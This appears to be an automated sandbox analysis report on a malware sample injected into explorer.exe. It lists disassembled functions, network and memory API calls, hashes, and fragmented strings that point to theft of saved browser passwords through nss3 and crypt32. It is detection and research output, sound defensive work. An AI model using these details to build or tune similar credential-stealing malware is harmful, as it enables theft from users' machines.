                                                                Uniqueness Score: -1.00%

                                                                Function 085D8F72 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 232 85d8f72-85d8fab 233 85d8fad-85d8fcf call 85dbeb2 232->233 234 85d8fd5-85d8ff0 WSAStartup 232->234 233->234
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Startup
                                                                • String ID: WSAS$tart
                                                                • API String ID: 724789610-2426239465
                                                                • Opcode ID: 9d5a9a750f08fbb59027bc66c78a2b909847f8483f0a00d47cc0b8618f26ed63
                                                                • Instruction ID: d0a54423d9fc58905b82dc684504ff1ca09da522efdd87bf518b5213881dc54e
                                                                • Opcode Fuzzy Hash: 9d5a9a750f08fbb59027bc66c78a2b909847f8483f0a00d47cc0b8618f26ed63
                                                                • Instruction Fuzzy Hash: 3E014F70508A088FCB54EF1CD08CB6ABBE0FB58312F1582A9D54DCB365C7B489858B96
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D8ED9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 237 85d8ed9-85d8f1a 238 85d8f1c-85d8f3e call 85dbeb2 237->238 239 85d8f44-85d8f65 socket 237->239 238->239
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: sock
                                                                • API String ID: 98920635-2415254727
                                                                • Opcode ID: bb2d97aff8fad754eba022eccf7524fd0729aaadde3baaf81db75c0d81669fa5
                                                                • Instruction ID: 3550318b46d76437739ff2edf152a1b1b8030f6ff770eccaaf22fc328686bd24
                                                                • Opcode Fuzzy Hash: bb2d97aff8fad754eba022eccf7524fd0729aaadde3baaf81db75c0d81669fa5
                                                                • Instruction Fuzzy Hash: 5C112D705186088FCB84EF1CD088B55BBE0FB98321F5585BED98DCB266C774C985CB86
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D8FF2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 242 85d8ff2-85d9025 243 85d904f-85d9077 send 242->243 244 85d9027-85d9049 call 85dbeb2 242->244 244->243
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: send
                                                                • String ID: send
                                                                • API String ID: 2809346765-2809346765
                                                                • Opcode ID: 60fd35f198776933029f722fbdd08e4fa2ec853b89f0f0b0404812bdb6649495
                                                                • Instruction ID: 2333d1cca42a08116150f1e6fa7e1690f97291de548fb1e4e22ad813b7f90c55
                                                                • Opcode Fuzzy Hash: 60fd35f198776933029f722fbdd08e4fa2ec853b89f0f0b0404812bdb6649495
                                                                • Instruction Fuzzy Hash: 81015230618A0C8FCB84EF1CD089B557BE0FB58311F1581BE994DCB266CA74D9818BC2
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D8EE2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 51networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 247 85d8ee2-85d8f1a 248 85d8f1c-85d8f3e call 85dbeb2 247->248 249 85d8f44-85d8f65 socket 247->249 248->249
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID: sock
                                                                • API String ID: 98920635-2415254727
                                                                • Opcode ID: 561c2f8e8799668198e8cd562bdfeef9c2cf512b9ca79e8d8810b0f6a402f05b
                                                                • Instruction ID: a1b163448fb2a1dfdcc4e40c2482b4d453c0bfe71b8d72bc4bb2e72b5492787b
                                                                • Opcode Fuzzy Hash: 561c2f8e8799668198e8cd562bdfeef9c2cf512b9ca79e8d8810b0f6a402f05b
                                                                • Instruction Fuzzy Hash: C2010C705186088FCB84EF5CD088B15BBE5FB98315F1581AE994DCB266C774C985CB86
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085DB4B1 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 252 85db4b1-85db4e6 253 85db4e9-85db4ed 252->253 254 85db4ef-85db4f2 253->254 255 85db569-85db572 253->255 254->255 256 85db4f4-85db55f call 85dd332 call 85dd302 call 85dc4f2 254->256 255->253 257 85db578-85db581 255->257 256->255 271 85db561-85db567 SleepEx 256->271 259 85db5ba-85db5d6 257->259 260 85db583-85db58a 257->260 262 85db58c-85db58d 260->262 263 85db59f-85db5a8 260->263 266 85db593-85db59d 262->266 263->259 264 85db5aa-85db5b1 263->264 264->259 267 85db5b3-85db5b4 264->267 266->263 266->266 267->259 271->255
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 9fc8bb0e9055f12b43ad5df4ce778584650a7ed13a3dfc61126a7fd461520635
                                                                • Instruction ID: a49bd1240ba0cfdf52846cde163827c23fa25a4eca9585237aeec53df95d79f4
                                                                • Opcode Fuzzy Hash: 9fc8bb0e9055f12b43ad5df4ce778584650a7ed13a3dfc61126a7fd461520635
                                                                • Instruction Fuzzy Hash: 3231D67151CB48CFDB39CF0CD8865E973E1FB95722F00065ED88A87216DA30A9428BD7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085DB4B2 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 272 85db4b2-85db4e6 273 85db4e9-85db4ed 272->273 274 85db4ef-85db4f2 273->274 275 85db569-85db572 273->275 274->275 276 85db4f4-85db55f call 85dd332 call 85dd302 call 85dc4f2 274->276 275->273 277 85db578-85db581 275->277 276->275 291 85db561-85db567 SleepEx 276->291 279 85db5ba-85db5d6 277->279 280 85db583-85db58a 277->280 282 85db58c-85db58d 280->282 283 85db59f-85db5a8 280->283 286 85db593-85db59d 282->286 283->279 284 85db5aa-85db5b1 283->284 284->279 287 85db5b3-85db5b4 284->287 286->283 286->286 287->279 291->275
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: eba7b3452b576319b508974859ddf961dcae560475de82c3afdd03d77257d503
                                                                • Instruction ID: b2df53687fdf906f2a60dc25168ce1bc6daeccbe664d3bf4f88bf5ff042282df
                                                                • Opcode Fuzzy Hash: eba7b3452b576319b508974859ddf961dcae560475de82c3afdd03d77257d503
                                                                • Instruction Fuzzy Hash: A131D67151CB48CFDB39CF0CD8865A973E1FB95722F00065ED88A87216DA30A9428BC7
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D4592 Relevance: 1.6, APIs: 1, Instructions: 84COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 292 85d4592-85d45d6 call 85d4012 call 85dbeb2 297 85d45dc-85d45de 292->297 298 85d4678-85d468c 292->298 299 85d45e2-85d45f3 SleepEx 297->299 299->299 300 85d45f5-85d4607 299->300 301 85d463d-85d4643 300->301 302 85d4609-85d460f 300->302 301->299 303 85d4645-85d464b 301->303 302->301 304 85d4611-85d4626 call 85d5002 302->304 303->299 305 85d464d-85d4653 303->305 304->301 310 85d4628-85d4638 call 85d4a42 304->310 305->299 307 85d4655-85d4666 call 85d5e22 call 85db4b2 305->307 314 85d466b-85d4673 call 85d43f2 307->314 310->301 314->299
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: Sleep
                                                                • String ID:
                                                                • API String ID: 3472027048-0
                                                                • Opcode ID: 8df4ce2ac5eaa2503645d014cf9c45fbc8d94c67ada043ed6313485285128dc9
                                                                • Instruction ID: e305e1861fab230f2040e9dac955d60d4a6404e1a99ad6e0893f2acaf3e5e1c3
                                                                • Opcode Fuzzy Hash: 8df4ce2ac5eaa2503645d014cf9c45fbc8d94c67ada043ed6313485285128dc9
                                                                • Instruction Fuzzy Hash: 27214F38604B4D8FCB74EF5C80946AAB7A2FB98302F88067EDD1ECB246DB709440CB55
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 085D4692 Relevance: 1.5, APIs: 1, Instructions: 48threadCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.530473205.0000000008580000.00000040.80000000.00040000.00000000.sdmp, Offset: 08580000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_8580000_explorer.jbxd
                                                                Similarity
                                                                • API ID: CreateThread
                                                                • String ID:
                                                                • API String ID: 2422867632-0
                                                                • Opcode ID: bc7d59821c7987c1171f8c6fd4aae5e7a5b6dd8efe268ab4d89298dbbcf98527
                                                                • Instruction ID: b34e23049dcc02bcde712dcee168acfd08a6270e33841d1964eae9e985a4f1ab
                                                                • Opcode Fuzzy Hash: bc7d59821c7987c1171f8c6fd4aae5e7a5b6dd8efe268ab4d89298dbbcf98527
                                                                • Instruction Fuzzy Hash: B6F0AF34618B094BCB98EF2CD48496AB3E0FBDC211F440A3EA94EC7254DA35C5818B16
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Non-executed Functions

                                                                Function 1080A289 Relevance: 11.7, Strings: 9, Instructions: 411COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$32.d$M$S$el32$kern$ll$p_JF$user
                                                                • API String ID: 0-1312245336
                                                                • Opcode ID: 2ed215582f573dffa2d8a91c7aa4ade675e9d1367f2c2e8bdd43f1d7f5db475c
                                                                • Instruction ID: 81edc69fec16c5ebcf17b98fe8873f7d6fc8a900ca86000abb1587e6b141cea2
                                                                • Opcode Fuzzy Hash: 2ed215582f573dffa2d8a91c7aa4ade675e9d1367f2c2e8bdd43f1d7f5db475c
                                                                • Instruction Fuzzy Hash: E3E16974618A499FCB89DF38C885A9AF3E1FF98300F50472EA0AEC7254DF74A551CB85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080E993 Relevance: 56.5, Strings: 45, Instructions: 218COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: bee22b2b48bbca590b3f1c758dbaa4a68799baee00ae4e724153f2c2e1725d88
                                                                • Instruction ID: 7505d5c76f0fe7208393f219f859a2ab8bd076ba773b17535fb9420f5b0c3ddc
                                                                • Opcode Fuzzy Hash: bee22b2b48bbca590b3f1c758dbaa4a68799baee00ae4e724153f2c2e1725d88
                                                                • Instruction Fuzzy Hash: 549150F04483988AC7158F55A0652AFFFB1EBC6305F15816DE7E6BB243C3BE89058B85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080E9A2 Relevance: 56.5, Strings: 45, Instructions: 209COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                                • API String ID: 0-3558027158
                                                                • Opcode ID: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                • Instruction ID: 52abdb2199f53210da2c7e9849683ad6ae8bdf1335d38161c6b75aefbdd88777
                                                                • Opcode Fuzzy Hash: 4a678110c588850d309b12d68528c88ad7d21129bf4e39003a41248f711be8d1
                                                                • Instruction Fuzzy Hash: D4914EF04082988AC7158F55A0612AFFFB1EBC6305F15816DE7E6BB243C3BE89458B85
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080AA82 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                • API String ID: 0-1539916866
                                                                • Opcode ID: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
                                                                • Instruction ID: bc76027fe57c874186edb7c9c2918e1b5277b62a2b83d883221fec925215e5b7
                                                                • Opcode Fuzzy Hash: 5524e9422ce90cd89ea5a8b31f63b1552e5f142a058918cd25d5ebbf8b83df53
                                                                • Instruction Fuzzy Hash: 8741B070B1CB088FDB14DF88A8456ADBBE2FB48700F00425EE449D3245DBB5AD458BD6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080BE71 Relevance: 9.0, Strings: 7, Instructions: 293COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                • API String ID: 0-2058692283
                                                                • Opcode ID: 189b50b220d6e89f4a4182c0f90b0f0d86b70e7f1b3317e31e5526836512696f
                                                                • Instruction ID: 3df364af032f9f4f112dd0f30da64b68987e644fedd01afc05329c8bfa1a8200
                                                                • Opcode Fuzzy Hash: 189b50b220d6e89f4a4182c0f90b0f0d86b70e7f1b3317e31e5526836512696f
                                                                • Instruction Fuzzy Hash: AFA1DF70A1C74C8FDB19DF6894446EEB7E2FF98300F40462EE48AD7256EF7095858B89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080BE72 Relevance: 9.0, Strings: 7, Instructions: 292COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UR$2$L: $Pass$User$name$word
                                                                • API String ID: 0-2058692283
                                                                • Opcode ID: f1c248cef5d2b82b19b32a2b3280473890c6179569dc8a939f8b39664926ebbb
                                                                • Instruction ID: 23dd1d8250b9d98bbc8cc6cef23fa44af931bca6f1f6d1d1dd381f6b7464d3c9
                                                                • Opcode Fuzzy Hash: f1c248cef5d2b82b19b32a2b3280473890c6179569dc8a939f8b39664926ebbb
                                                                • Instruction Fuzzy Hash: A191CF70A1C74C8FDB19DF6894446EEB7E2FF98300F40462EE48AD7256EF7095858B89
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080AC02 Relevance: 7.7, Strings: 6, Instructions: 164COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: U$b$d$k$n$o
                                                                • API String ID: 0-1739295752
                                                                • Opcode ID: 06f6cd3f0d520095a53164c19754397b37e4e30266161c8f4d9167010780d931
                                                                • Instruction ID: c4d5e87422792febed69236b3cc4b67b83068ae43e0c153a7f513de61b2ee4c5
                                                                • Opcode Fuzzy Hash: 06f6cd3f0d520095a53164c19754397b37e4e30266161c8f4d9167010780d931
                                                                • Instruction Fuzzy Hash: 29519374A14A1D8FCB48EFA8D8957DEF3A1FF54301F004619E41ACB255EF34AA948BC5
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080C1CF Relevance: 6.5, Strings: 5, Instructions: 210COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                • API String ID: 0-1478216402
                                                                • Opcode ID: f890d4b302267c772db7a83cf258fdf75d99a7a0b494c58845bbe1611ba74f76
                                                                • Instruction ID: 51f6653d72b9ff4727dff888691c7570d915ec07922f92849495d78084c7ea4d
                                                                • Opcode Fuzzy Hash: f890d4b302267c772db7a83cf258fdf75d99a7a0b494c58845bbe1611ba74f76
                                                                • Instruction Fuzzy Hash: 69714D74618F0D8FDB54DF68C4557EAB3E1FF18700F40462AA44AC7298DB74A994CBC6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080C1D2 Relevance: 6.5, Strings: 5, Instructions: 205COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$cryp$dll$nss3$t32.
                                                                • API String ID: 0-1478216402
                                                                • Opcode ID: c03a7443bc06fddc1a2921b73c7c08c336d6a25a24a6c23b1c1eb3b547557f28
                                                                • Instruction ID: 179afdf7888b6e77c0e4e69c6ff6c75f93a8401a32ce8fd69289aa1563c900c1
                                                                • Opcode Fuzzy Hash: c03a7443bc06fddc1a2921b73c7c08c336d6a25a24a6c23b1c1eb3b547557f28
                                                                • Instruction Fuzzy Hash: 6C615D74A18F0D8FDB54DF68C4557EAB3E1FF18700F40462AA44AC7298DB74A994CBC6
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 108097E2 Relevance: 6.4, Strings: 5, Instructions: 185COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 2.dl$dll$l32.$ole3$shel
                                                                • API String ID: 0-1970020201
                                                                • Opcode ID: 99f58036bad15f72d438468ef0a43aff026970ea5dc8e8bb6e66954c2a8821a2
                                                                • Instruction ID: 11052db07a115fe066722cc6f3bc1ee2a0581bfbd48cf56047cf5565da8a6c08
                                                                • Opcode Fuzzy Hash: 99f58036bad15f72d438468ef0a43aff026970ea5dc8e8bb6e66954c2a8821a2
                                                                • Instruction Fuzzy Hash: 8A616074918B0C8FDB55DFA8C449ADAB7F1FF58300F404A2EE49ADB254EF30A5418B99
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080C472 Relevance: 6.4, Strings: 5, Instructions: 104COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: -Age$User$nt: $on.d$urlm
                                                                • API String ID: 0-1987325725
                                                                • Opcode ID: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction ID: b3e2d7eb3013d2cdb5b5696e6172ac4587fe0492d32003f6464061e4947ac711
                                                                • Opcode Fuzzy Hash: d39db5116cbb94e920403d79280b132d67c6a1c700a78bc228144ed42e862d9f
                                                                • Instruction Fuzzy Hash: 5831D334A14A4C8FCB45EFA8C8852ED77E1FF58204F00022AE45ED7240EE789644CB95
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Function 1080A002 Relevance: 5.1, Strings: 4, Instructions: 145COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.536515243.00000000107B0000.00000040.00000001.00040000.00000000.sdmp, Offset: 107B0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_107b0000_explorer.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: .dll$el32$h$kern
                                                                • API String ID: 0-4264704552
                                                                • Opcode ID: be2073997aa64e6b0719d8a7a610da43e0c7b4a9b3273338c33fc6554eb5d4ee
                                                                • Instruction ID: 968aad43abe2fbe1641d03802ebb6ac372418f584ec66ac99678eeb810b01b64
                                                                • Opcode Fuzzy Hash: be2073997aa64e6b0719d8a7a610da43e0c7b4a9b3273338c33fc6554eb5d4ee
                                                                • Instruction Fuzzy Hash: 07414D7461CB498FD799DF2888843AAB6E1FF98301F104B2E949AC7255DB70D585CB42
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                Execution Graph

                                                                Execution Coverage:7.4%
                                                                Dynamic/Decrypted Code Coverage:1.5%
                                                                Signature Coverage:2.1%
                                                                Total number of Nodes:1098
                                                                Total number of Limit Nodes:136
                                                                execution_graph 32988 2c29710 32989 2c29735 32988->32989 32994 2c2b150 32989->32994 32991 2c29768 32993 2c2978d 32991->32993 32999 2c2cd10 32991->32999 32996 2c2b174 32994->32996 32995 2c2b17b 32995->32991 32996->32995 32997 2c2b1b0 LdrLoadDll 32996->32997 32998 2c2b1c7 32996->32998 32997->32998 32998->32991 33000 2c2cd3c 32999->33000 33010 2c3c6b0 33000->33010 33003 2c2cd5c 33003->32993 33004 2c2cd7f 33004->33003 33018 2c3cce0 33004->33018 33007 2c2cd97 33021 2c3c960 33007->33021 33009 2c2cdba 33009->32993 33024 2c3d4a0 33010->33024 33012 2c2cd55 33012->33003 33012->33004 33013 2c3c6f0 33012->33013 33014 2c3d4a0 LdrLoadDll 33013->33014 33015 2c3c70c 33014->33015 33034 3269710 LdrInitializeThunk 33015->33034 33016 2c3c727 33016->33004 33019 2c3ccff 33018->33019 33020 2c3d4a0 LdrLoadDll 33018->33020 33019->33007 33020->33019 33022 2c3c97c NtClose 33021->33022 33023 2c3d4a0 LdrLoadDll 33021->33023 33022->33009 33023->33022 33025 2c3d525 33024->33025 33027 2c3d4af 33024->33027 33025->33012 33027->33025 33028 2c37830 33027->33028 33029 2c3784a 33028->33029 33030 2c3783e 33028->33030 33029->33025 33030->33029 33033 2c37cb0 LdrLoadDll 33030->33033 33032 2c3799c 33032->33025 33033->33032 33034->33016 33035 2c3b580 33046 2c3e350 33035->33046 33037 2c3b6b6 33038 2c3b5bb 33038->33037 33039 2c2b150 LdrLoadDll 33038->33039 33040 2c3b5fb 33039->33040 33041 2c37830 LdrLoadDll 33040->33041 33043 2c3b620 33041->33043 33042 2c3b630 Sleep 33042->33043 33043->33037 33043->33042 33049 2c3b1f0 LdrLoadDll 33043->33049 33050 2c3b3d0 LdrLoadDll 33043->33050 33051 2c3ca10 33046->33051 33048 2c3e37d 33048->33038 33049->33043 33050->33043 33052 2c3d4a0 LdrLoadDll 33051->33052 33053 2c3ca2c NtAllocateVirtualMemory 33052->33053 33053->33048 33054 3269540 LdrInitializeThunk 33058 2c4169d 33061 2c3df70 33058->33061 33062 2c3df96 33061->33062 33069 2c2a0e0 33062->33069 33064 2c3dfa2 33065 2c3dfd0 33064->33065 33077 2c290f0 33064->33077 33109 2c3cb80 33065->33109 33112 2c2a030 33069->33112 33071 2c2a0ed 33072 2c2a0f4 33071->33072 33124 2c29fd0 33071->33124 33072->33064 33078 2c29117 33077->33078 33558 2c2b620 33078->33558 33080 2c29129 33562 2c2b370 33080->33562 33082 2c2915e 33089 2c29165 33082->33089 33605 2c2b2a0 LdrLoadDll 33082->33605 33085 2c291d5 33086 2c3e4b0 2 API calls 33085->33086 33107 2c2941d 33085->33107 33087 2c291eb 33086->33087 33088 2c3e4b0 2 API calls 33087->33088 33090 2c291fc 33088->33090 33089->33107 33566 2c2e310 33089->33566 33091 2c3e4b0 2 API calls 33090->33091 33092 2c2920d 33091->33092 33578 2c2c890 33092->33578 33094 2c2921a 33095 2c37420 10 API calls 33094->33095 33096 2c2922b 33095->33096 33097 2c37420 10 API calls 33096->33097 33098 2c2923c 33097->33098 33099 2c29260 33098->33099 33101 2c37420 10 API calls 33098->33101 33100 2c37420 10 API calls 33099->33100 33108 2c292a8 33099->33108 33104 2c29277 33100->33104 33102 2c29259 33101->33102 33606 2c2c9e0 LdrLoadDll 33102->33606 33104->33108 33607 2c2d380 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33104->33607 33107->33065 33108->33107 33590 2c28d70 33108->33590 33110 2c3d4a0 LdrLoadDll 33109->33110 33111 2c3cb9f 33110->33111 33113 2c2a043 33112->33113 33163 2c3b100 LdrLoadDll 33112->33163 33143 2c3afc0 33113->33143 33116 2c2a056 33116->33071 33117 2c2a04c 33117->33116 33146 2c3d820 33117->33146 33119 2c2a093 33119->33116 33157 2c29e70 33119->33157 33121 2c2a0b3 33164 2c298d0 LdrLoadDll 33121->33164 33123 2c2a0c5 33123->33071 33125 2c29fed 33124->33125 33126 2c3db10 LdrLoadDll 33124->33126 33540 2c3db10 33125->33540 33126->33125 33129 2c3db10 LdrLoadDll 33130 2c2a01a 33129->33130 33131 2c2e0d0 33130->33131 33132 2c2e0e9 33131->33132 33544 2c2b4a0 33132->33544 33134 2c2e0fc 33135 2c3c6b0 LdrLoadDll 33134->33135 33136 2c2e10b 33135->33136 33142 2c2a105 33136->33142 33548 2c3cca0 33136->33548 33138 2c2e122 33141 2c2e14d 33138->33141 33551 2c3c730 33138->33551 